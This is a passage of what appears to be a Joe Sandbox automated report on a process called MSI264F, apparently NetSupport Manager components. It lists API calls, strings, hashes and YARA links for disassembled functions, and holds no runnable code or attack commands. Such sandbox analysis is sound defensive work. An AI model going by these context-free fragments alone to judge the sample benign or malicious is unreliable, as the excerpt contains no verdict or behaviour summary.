                                                                                                                        Function 00AE11F0 Relevance: 19.7, APIs: 13, Instructions: 154COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _fgetc_fseek$__filbuf__fread_nolock__lock_file_free_malloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3536299624-0
                                                                                                                        • Opcode ID: 3d21dc13fdc09310c1574d7e7448c9164788b925481952a555ab9488c7d4feb5
                                                                                                                        • Instruction ID: 6d08e6333c3beb55fad7246de52ecb33ddccfdaa6aa15ea26ab1ec7b0e95dbd1
                                                                                                                        • Opcode Fuzzy Hash: 3d21dc13fdc09310c1574d7e7448c9164788b925481952a555ab9488c7d4feb5
                                                                                                                        • Instruction Fuzzy Hash: 6041E5F194424197EB309F95DC81B7B73F8DB50710F200AADE5068AA41DAB5ED4887E2
                                                                                                                        Function 00AE27E0 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 361COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B18DB0: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00B18DD7
                                                                                                                          • Part of subcall function 00B39583: __wfsopen.LIBCMT ref: 00B39590
                                                                                                                        • _wcstoul.LIBCMT ref: 00AE2999
                                                                                                                          • Part of subcall function 00B39491: wcstoxl.LIBCMT ref: 00B394A1
                                                                                                                        • _wcschr.LIBCMT ref: 00AE29F2
                                                                                                                        • _wcschr.LIBCMT ref: 00AE2AC4
                                                                                                                        • _wcschr.LIBCMT ref: 00AE2AE8
                                                                                                                        • __wcsicoll.LIBCMT ref: 00AE2B01
                                                                                                                        • _wcschr.LIBCMT ref: 00AE2B23
                                                                                                                        • _wcschr.LIBCMT ref: 00AE2B82
                                                                                                                        • _wcstok.LIBCMT ref: 00AE2B98
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr$EnvironmentExpandStrings__wcsicoll__wfsopen_wcstok_wcstoulwcstoxl
                                                                                                                        • String ID: %s.%04d.%s$Client$Untitled
                                                                                                                        • API String ID: 3554892265-2892719752
                                                                                                                        • Opcode ID: db54c4c925b6f11cc7470feecc6c73bfe27caf4cf30722bfb07d0017308b1f6e
                                                                                                                        • Instruction ID: 4e9fd9748acc87afd72fb7364f91865098048691d098367c8f8cb9b1272ab375
                                                                                                                        • Opcode Fuzzy Hash: db54c4c925b6f11cc7470feecc6c73bfe27caf4cf30722bfb07d0017308b1f6e
                                                                                                                        • Instruction Fuzzy Hash: 5ED1E271E002559BDB34EB25CC46BEEB3B8AF55340F1440E9F809A7641EF749E85CB92
                                                                                                                        Function 00B06680 Relevance: 19.6, APIs: 13, Instructions: 103windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(00000000), ref: 00B06698
                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00B066AD
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00B066B6
                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00B066C0
                                                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00B066D5
                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00B0670E
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00B06719
                                                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00B0673D
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00B06748
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00B06755
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00B0675C
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00B06763
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00B06768
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$Select$CompatibleCreate$Delete$BitmapRelease
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1133104291-0
                                                                                                                        • Opcode ID: 94437d49851d23a938a029bb0fbd6561c47e10946d99d7f7143770ff7d20e7cc
                                                                                                                        • Instruction ID: 4bd7de3d9f6a6b716d120b116ac2382dad7154d907cb78264bdffcedcc1d8c6c
                                                                                                                        • Opcode Fuzzy Hash: 94437d49851d23a938a029bb0fbd6561c47e10946d99d7f7143770ff7d20e7cc
                                                                                                                        • Instruction Fuzzy Hash: AB310E75910219BFDB04DFA8DC89DAEBBBCEF49710F10815AF905E7250DA749D40CBA0
                                                                                                                        Function 00B245E0 Relevance: 19.6, APIs: 13, Instructions: 97COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsDlgButtonChecked.USER32(?,00000428), ref: 00B24604
                                                                                                                        • EndDialog.USER32(?,00000428), ref: 00B24617
                                                                                                                        • GetDlgItem.USER32(?,00000427), ref: 00B24635
                                                                                                                        • GetDlgItem.USER32(?,00000428), ref: 00B2463F
                                                                                                                        • SetForegroundWindow.USER32(?), ref: 00B24664
                                                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 00B24681
                                                                                                                        • EnableWindow.USER32(?,00000000), ref: 00B2468D
                                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 00B2469C
                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00B246A4
                                                                                                                        • GetDlgItem.USER32(?,00000426), ref: 00B246AE
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00B246B1
                                                                                                                        • CheckDlgButton.USER32(?,00000428,00000001), ref: 00B246C7
                                                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 00B246D0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$EnableItemShow$Button$CheckCheckedDialogForeground
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1869407622-0
                                                                                                                        • Opcode ID: 3a0fc2d6e3eeca40a98fb26b6d9ebe7ab806debad34faf2bfd44aafca62e02ee
                                                                                                                        • Instruction ID: 93befbf15ee50ad8febd5e67174070077d93349bca55585737aa69afc01eeab3
                                                                                                                        • Opcode Fuzzy Hash: 3a0fc2d6e3eeca40a98fb26b6d9ebe7ab806debad34faf2bfd44aafca62e02ee
                                                                                                                        • Instruction Fuzzy Hash: C221A6323402147BDB216B69FC45FAE77ACEF55B51F004015F608DB2D0CFB9A8418B68
                                                                                                                        Function 00B06780 Relevance: 19.6, APIs: 13, Instructions: 94windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(00000000), ref: 00B06798
                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00B067B8
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00B067C2
                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00B067C8
                                                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00B067D6
                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00B067E5
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00B067F0
                                                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00B06816
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00B06821
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00B0682A
                                                                                                                        • SelectObject.GDI32(?,?), ref: 00B0683A
                                                                                                                        • DeleteDC.GDI32(?), ref: 00B06840
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00B06845
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$Select$CompatibleCreate$Delete$BitmapRelease
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1133104291-0
                                                                                                                        • Opcode ID: 77246a7231bd5bcee1d282ae8cf9aa3dfcf170bcca2edce22603b43c3ca97ef8
                                                                                                                        • Instruction ID: 0f3aafb975a2d5e1c9573ceb782f3611950bf1830e60480f4ac6b276de90447f
                                                                                                                        • Opcode Fuzzy Hash: 77246a7231bd5bcee1d282ae8cf9aa3dfcf170bcca2edce22603b43c3ca97ef8
                                                                                                                        • Instruction Fuzzy Hash: AE31F075910218BFDB10DFA5DC85FEEBBBCEB49710F108159F904E7280DA74AE418BA0
                                                                                                                        Function 00AE8660 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 260registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00AE2337,?), ref: 00AE86C6
                                                                                                                        • _malloc.LIBCMT ref: 00AE870D
                                                                                                                        • RegEnumValueW.ADVAPI32(?,?,?,?,00000000,?,?,?,00000000,00AE2337,?), ref: 00AE874D
                                                                                                                        • __wcsicoll.LIBCMT ref: 00AE8783
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumInfoQueryValue__wcsicoll_malloc
                                                                                                                        • String ID: ..\CTL32\Config.cpp$_tcslen (k.m_k) < _tsizeof (m_szSectionAndKey)$err == 0$maxname < _tsizeof (m_szSectionAndKey)
                                                                                                                        • API String ID: 4048192996-1815789771
                                                                                                                        • Opcode ID: 24794d0044ee1d905415758be0865b1de263c92ed6bcc7c0d12efd2f85c35abd
                                                                                                                        • Instruction ID: af32ac347b9ce7a13e20318246b33c421079d51febaaa73712af1b2eefaa379b
                                                                                                                        • Opcode Fuzzy Hash: 24794d0044ee1d905415758be0865b1de263c92ed6bcc7c0d12efd2f85c35abd
                                                                                                                        • Instruction Fuzzy Hash: 8A91D075A00741AFDB30DF66C881B67B7F8AF58300F10495CE88A97691EB78FA44CB61
                                                                                                                        Function 00B1C04E Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 143COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • ..\CTL32\util.cpp, xrefs: 00B1C21C
                                                                                                                        • e:\nsmsrc\nsm\1410\1410\ctl32\NSMString.h, xrefs: 00B1C1C1
                                                                                                                        • Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes, xrefs: 00B1C195
                                                                                                                        • MS Shell Dlg, xrefs: 00B1C16F
                                                                                                                        • hSubstitutedFont, xrefs: 00B1C221
                                                                                                                        • IsA(), xrefs: 00B1C1C6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$CreateFontIndirectStock__wcsicoll_memset
                                                                                                                        • String ID: ..\CTL32\util.cpp$IsA()$MS Shell Dlg$Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes$e:\nsmsrc\nsm\1410\1410\ctl32\NSMString.h$hSubstitutedFont
                                                                                                                        • API String ID: 2021381788-3700668608
                                                                                                                        • Opcode ID: d60150b369e8541b6d7499c18f37e155e3d9c7d12af8f58d1d9d1baad7b23b41
                                                                                                                        • Instruction ID: 7c04e92fdcf5a3c526298e8a0175437e8c4c106428bc5cb3e16a9682408326e5
                                                                                                                        • Opcode Fuzzy Hash: d60150b369e8541b6d7499c18f37e155e3d9c7d12af8f58d1d9d1baad7b23b41
                                                                                                                        • Instruction Fuzzy Hash: A6419171980309ABDB20DFE8DC56BEE7BF4EF19700F944199E815AB292EB745904CB60
                                                                                                                        Function 00B2EA85 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 114sleepwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000100,00B8CB80), ref: 00B2E682
                                                                                                                        • PostMessageW.USER32(?,000003E1,?,00000000), ref: 00B2EDE1
                                                                                                                        • DestroyWindow.USER32(?), ref: 00B2EDEE
                                                                                                                        • _fputs.LIBCMT ref: 00B2EE3D
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 00B2EE58
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDestroyDirectoryMessagePostSleepWindow_fputs
                                                                                                                        • String ID: Created main window %08x$Done:$Exit$OK$Restart$winexec.ok
                                                                                                                        • API String ID: 3868255415-3127719662
                                                                                                                        • Opcode ID: bc2f11fde5c68dffcfb46d5eb0a335042eb5385cb2bb67183b93f966753dcdf5
                                                                                                                        • Instruction ID: 30e933e06272fb6948508f9c86511e05b604400db4230acd5f273e65754c548c
                                                                                                                        • Opcode Fuzzy Hash: bc2f11fde5c68dffcfb46d5eb0a335042eb5385cb2bb67183b93f966753dcdf5
                                                                                                                        • Instruction Fuzzy Hash: 0F41E3B1D40221DBDB20AF65BC92A5A37F4FB14341F4444F9E45D972A1EFB49980CBA2
                                                                                                                        Function 00B1EDB0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 104processsynchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B18BC0: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00B18C1C
                                                                                                                          • Part of subcall function 00B18BC0: SHGetFolderPathW.SHFOLDER(00000000,00000026,00000000,00000000,?,?,?), ref: 00B18C5F
                                                                                                                          • Part of subcall function 00B18BC0: SHGetFolderPathW.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 00B18CB7
                                                                                                                        • wsprintfW.USER32 ref: 00B1EDEC
                                                                                                                        • PlaySoundW.WINMM(?,?,?), ref: 00B1EED8
                                                                                                                          • Part of subcall function 00B192B0: GetVersionExW.KERNEL32(00B8BEF0,?), ref: 00B192E0
                                                                                                                          • Part of subcall function 00B192B0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 00B1931F
                                                                                                                          • Part of subcall function 00B192B0: _memset.LIBCMT ref: 00B19343
                                                                                                                          • Part of subcall function 00B192B0: _wcsncpy.LIBCMT ref: 00B1941B
                                                                                                                        • wsprintfW.USER32 ref: 00B1EE43
                                                                                                                        • _memset.LIBCMT ref: 00B1EE50
                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,?,?), ref: 00B1EE88
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B1EEA0
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00B1EEB3
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00B1EEBC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseFolderHandlePath_memsetwsprintf$CreateFileModuleNameObjectOpenPlayProcessSingleSoundVersionWait_wcsncpy
                                                                                                                        • String ID: %s %s$%sPlaySound.exe$D
                                                                                                                        • API String ID: 2176068269-2983100991
                                                                                                                        • Opcode ID: 80380babf74a1dcc358827424e60d446d25024e458fe26d76c924950fa4ff084
                                                                                                                        • Instruction ID: 4da1b04954c0cf6a8cf190a33e8424e21051d7f42e79e449b3183bc27cad2afd
                                                                                                                        • Opcode Fuzzy Hash: 80380babf74a1dcc358827424e60d446d25024e458fe26d76c924950fa4ff084
                                                                                                                        • Instruction Fuzzy Hash: 8B31B8B2A40318A7DB20DB64DC46FEA73BDEB84710F1041C9FA19A71C1DEB5AA54CF90
                                                                                                                        Function 00B45135 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 97COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __getptd$BuildCatchMatchObjectType
                                                                                                                        • String ID: MOC$RCC$csm$csm
                                                                                                                        • API String ID: 1559916381-1441736206
                                                                                                                        • Opcode ID: 6dd3cc991e45b426163a896235f6b0bb2d21474d5710646f0ecea70e66d6aa48
                                                                                                                        • Instruction ID: 52f440d4d6321116b96142519c7ddb9b5ff2965d52be724d45d354c27c46e6d2
                                                                                                                        • Opcode Fuzzy Hash: 6dd3cc991e45b426163a896235f6b0bb2d21474d5710646f0ecea70e66d6aa48
                                                                                                                        • Instruction Fuzzy Hash: ED318B75400E099FCF308F6884847AA73E8FF55311F5948EAE84AD6113D7B0EB45AB92
                                                                                                                        Function 00B06D70 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 87COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: GlobalLock
                                                                                                                        • String ID: ..\CTL32\pcibmp.cpp$lpDIBHdr
                                                                                                                        • API String ID: 2848605275-3862004634
                                                                                                                        • Opcode ID: 87f6be22898d902848d263759e0600d0fa529305edb1c386faf97eb968e9a314
                                                                                                                        • Instruction ID: 3ccf4ce51c5a9b9be685cb44326fe7ae81bf3d861901cd65ba4a83a4e360c359
                                                                                                                        • Opcode Fuzzy Hash: 87f6be22898d902848d263759e0600d0fa529305edb1c386faf97eb968e9a314
                                                                                                                        • Instruction Fuzzy Hash: 8F21D5767402057BDB205BA9AC4DF9B7BACEB85761F1001A5FE08D72D0DEB5C81086E1
                                                                                                                        Function 00B154D0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 79libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 00B154F6
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00B154FD
                                                                                                                        • GetCurrentProcessId.KERNEL32(00000000), ref: 00B15513
                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00B15531
                                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 00B1553B
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00B1554E
                                                                                                                        • GetTokenInformation.ADVAPI32(00000000,0000000C(TokenIntegrityLevel),00B876D4,00000004,?), ref: 00B1556D
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B15594
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B1559B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$Handle$CloseCurrentOpenToken$AddressInformationModuleProc
                                                                                                                        • String ID: ProcessIdToSessionId$kernel32.dll
                                                                                                                        • API String ID: 2536908267-3889420803
                                                                                                                        • Opcode ID: 1f641455995811170a1f2cb8d695839c1a79b3bf4dd927f35b34ded445de237d
